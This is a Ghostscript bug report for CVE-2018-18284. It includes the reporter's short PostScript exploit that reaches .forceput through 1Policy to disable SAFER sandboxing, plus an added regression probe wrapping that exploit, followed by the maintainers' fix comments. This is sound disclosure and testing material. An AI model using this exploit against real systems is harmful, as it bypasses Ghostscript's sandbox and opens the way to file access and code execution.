Bug 699963 - 1Policy is a dangerous operator, any callers should be odef
Status: RESOLVED FIXED
Alias: None
Product: Ghostscript
Classification: Unclassified
Component: Security (public)
Version: unspecified
Hardware: PC Linux
Importance: P4 normal
Assignee: Ken Sharp
Reported: 2018-10-12 21:47 UTC by Tavis Ormandy
Modified: 2019-05-08 13:27 UTC

Description Tavis Ormandy 2018-10-12 21:47:39 UTC
1Policy (from gs_setpd.ps) is basically a wrapper around .forceput, and therefore any callers need to be pseudo-operators.

Exploit:

/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1 get exec pop pop pop pop pop pop pop } def

GS>systemdict /SAFER false .forceput
GS>SAFER ==
false

See bug 699816 for a full forceput exploit.
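Added regression probe (editor's addition, not part of the report or of Ghostscript): it wraps the reporter's .forceput redefinition in a stopped context so that a single run prints a verdict instead of aborting on the error a fixed build raises. The file name probe.ps, the gs command line in the header comment and the printed verdict strings are this example's own choices; the wrapper itself is exactly the one from the description above.

```postscript
%!PS
% Regression probe for bug 699963 / CVE-2018-18284 (added example, not part of
% the report or of Ghostscript). Suggested invocation (assumed flags):
%   gs -q -dSAFER -dNODISPLAY -dBATCH -dNOPAUSE probe.ps
% On a vulnerable build the last line reads "VULNERABLE: SAFER is now false";
% on a fixed build the attempt stops with an error, which is reported instead.

% 1. Is the policy-procedure array still visible from user code at all?
/.policyprocs where
  { pop (.policyprocs: reachable from user code\n) print }
  { (.policyprocs: not reachable (undefined)\n) print }
ifelse

% 2. The reporter's wrapper: route a systemdict write through 1Policy's
%    bound .forceput. Deliberately NOT bound, so the inner .forceput name is
%    resolved at run time to the userdict wrapper, as in the original PoC.
/attempt {
  /.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index
               .policyprocs 1 get exec pop pop pop pop pop pop pop } def
  systemdict /SAFER false .forceput
} def

% 3. Run it under stopped so a fixed build reports the error name cleanly.
{ attempt } stopped
  { % the attempt errored out: say which error stopped it
    (attempt raised /) print $error /errorname get =only (\n) print
    $error /newerror false put      % clear the error so BATCH exits cleanly
  }
  { % no error: check whether the write into systemdict actually landed
    SAFER
      { (attempt ran but SAFER is still true\n) print }
      { (VULNERABLE: SAFER is now false\n) print }
    ifelse
  }
ifelse
clear   % the wrapper leaves operands behind on some paths; tidy up
```

The probe does not need to know which error a fixed build raises (undefined, invalidaccess, or something else): any error is reported by name, and only a run that completes with SAFER cleared is flagged as vulnerable, so the same file serves as a before/after check across the commits referenced in the comments below.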
Comment 1 Tavis Ormandy 2018-10-13 00:28:10 UTC
This is CVE-2018-18284
Comment 2 Ken Sharp 2018-10-15 10:29:31 UTC
I have a fix but I want Chris to review it, so it'll be tomorrow before it gets applied, assuming Chris is happy with the change.
Comment 3 Ken Sharp 2018-10-16 08:35:38 UTC
Fixed in commit 30cd347f37bfb293ffdc407397d1023628400b81
Comment 4 Ken Sharp 2018-10-16 08:36:45 UTC
Oops :-( Wrong way round. This one is fixed with *this* commit 8d19fdf63f91f50466b08f23e2d93d37a4c5ea0b